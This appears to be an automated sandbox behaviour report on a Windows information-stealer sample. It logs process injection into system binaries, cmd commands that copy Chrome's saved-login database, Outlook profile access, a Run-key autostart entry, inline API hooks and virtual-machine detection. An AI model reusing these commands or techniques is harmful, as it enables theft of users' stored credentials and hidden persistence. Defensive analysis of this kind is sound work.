Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Windows\explorer.exe	Process created: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\secinit.exe'
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3ad05575-8857-4850-9277-11b85bdb8e09}\InProcServer32

Source: C:\Windows\SysWOW64\ipconfig.exe

File written: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.ini

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source:	Binary string: ipconfig.pdb source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: secinit.pdbGCTL source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, vp21b7dsh.exe.3.dr
Source:	Binary string: wntdll.pdbUGP source: secinit.exe, 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: secinit.exe, ipconfig.exe
Source:	Binary string: secinit.pdb source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, vp21b7dsh.exe.3.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp

Source: vp21b7dsh.exe.3.dr

Static PE information: 0xF19D1945 [Sat Jun 14 17:17:57 2098 UTC]

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0389D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042DA5E push 2E339416h; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104272BD push ebp; iretd
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10426500 push esi; retf
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104265E2 push ebp; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10426601 push esi; retf
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C6C5 push eax; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C77C push eax; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C712 push eax; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042C71B push eax; ret
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104297C4 pushad ; retf
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BDD0D1 push ecx; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016DA5E push 2E339416h; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_001672BD push ebp; iretd
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C6C5 push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C712 push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C71B push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016C77C push eax; ret
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_001697C4 pushad ; retf
Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	Code function: 21_2_00F11DC1 push ecx; ret

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe			Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\ipconfig.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 5JFT3T18NV

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xB3 0x3C

Source: C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\secinit.exe	RDTSC instruction interceptor: First address: 00000000104198B4 second address: 00000000104198BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\secinit.exe	RDTSC instruction interceptor: First address: 0000000010419B2E second address: 0000000010419B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 00000000001598B4 second address: 00000000001598BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000000159B2E second address: 0000000000159B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\secinit.exe

Code function: 2_2_03876B90 rdtsc

Source: C:\Windows\explorer.exe TID: 6656	Thread sleep time: -56000s >= -30000s
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 5988	Thread sleep time: -45000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.712768115.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.708284479.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.712768115.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.930435954.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.713034911.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.713034911.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000003.00000000.707548734.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\secinit.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\secinit.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort

Source: C:\Windows\SysWOW64\secinit.exe

Code function: 2_2_03876B90 rdtsc

Source: C:\Windows\SysWOW64\secinit.exe

Code function: 2_2_03889780 NtMapViewOfSection,LdrInitializeThunk,

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03851B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03851B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03858794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0390138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03874BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03915BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038703E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038837F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0390131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0391070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03844F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03844F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03873B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03873B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038DFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03910EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03910EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03910EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038736CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03888EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038716E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038576E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03878E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03858A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03845210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03863A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03884A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03884A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03857E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038D4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0386C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03842D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038735A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038761A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03871DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03871DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03871DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038C6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038D41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038F8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03849100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03918D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03853D34 mov eax, dword ptr fs:[00000030h]
